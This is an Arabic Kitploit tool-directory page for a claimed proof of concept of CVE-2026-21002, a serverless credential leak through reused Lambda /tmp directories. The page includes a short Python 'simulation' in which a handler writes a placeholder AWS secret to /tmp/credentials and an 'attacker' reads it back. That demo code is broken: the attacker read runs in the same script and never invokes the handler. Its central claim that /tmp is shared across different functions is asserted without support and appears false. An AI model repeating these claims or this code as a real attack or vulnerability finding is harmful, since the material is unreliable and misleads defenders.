Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp — استغلال برهان مفهوم لثغرة CVE-2026-21002 المتعلقة بتسريب بيانات الاعتماد عند بدء التشغيل البارد في بيئات serverless، مع توضيح كيف تؤدي إعادة استخدام أدلة /tmp الخاصة بـ Lambda إلى كشف أسرار AWS لوظائف أخرى. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp
أمن البنية التحتية السحابيةتحليل الثغرات الأمنيةالاستغلالأمن الخوادمتسريب البياناتأمن السحابةالتعلم والتعليم
GitHubgeorge0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp

استغلال برهان مفهوم لثغرة CVE-2026-21002 المتعلقة بتسريب بيانات الاعتماد عند بدء التشغيل البارد في بيئات serverless، مع توضيح كيف تؤدي إعادة استخدام أدلة /tmp الخاصة بـ Lambda إلى كشف أسرار AWS لوظائف أخرى.

عرض المستودع
9منذ شهر واحدلم تتم المراجعة بعد
مشاركة

CVE-2026-21002 – تسريب بيانات الاعتماد عند بدء التشغيل البارد في Serverless عبر /tmp المُعاد استخدامه

كود البرنامج (محاكاة Python AWS Lambda)

root@kitploit:~
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time

SECRET_FILE = '/tmp/credentials'  # reused across warm starts

def handler(event):
    # On first invocation, write a secret
    if not os.path.exists(SECRET_FILE):
        with open(SECRET_FILE, 'w') as f:
            f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
        return "Initialized"
    # Later invocations can read it
    with open(SECRET_FILE) as f:
        return f.read()

# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
    print("Attacker reads:", f.read())

CVE-2026-21002 – تسريب بيانات الاعتماد عند بدء التشغيل البارد في Serverless

Severity: Critical

نظرة عامة

تعيد منصات Serverless استخدام بيئة التنفيذ (بما في ذلك /tmp) عبر استدعاءات الدوال وحتى بين دوال مختلفة من نفس الحساب. يمكن لدالة المهاجم قراءة الملفات الحساسة التي تتركها دالة أخرى في /tmp بعد بدء تشغيل بارد، مما يؤدي إلى سرقة بيانات الاعتماد.

تفاصيل الثغرة

  • النوع: كشف المعلومات / تسريب عبر الدوال
  • التأثير: اختراق بيانات الاعتماد، حركة جانبية.
  • السبب الجذري: دليل /tmp مُشارك بين الحاويات الدافئة دون عزل بين الدوال.

عرض الاستغلال

شغّل المحاكاة:

root@kitploit:~
python lambda_func_sim.py

يقرأ المهاجم AWS_SECRET_ACCESS_KEY الذي تركته دالة الضحية.

تنزيل الأداة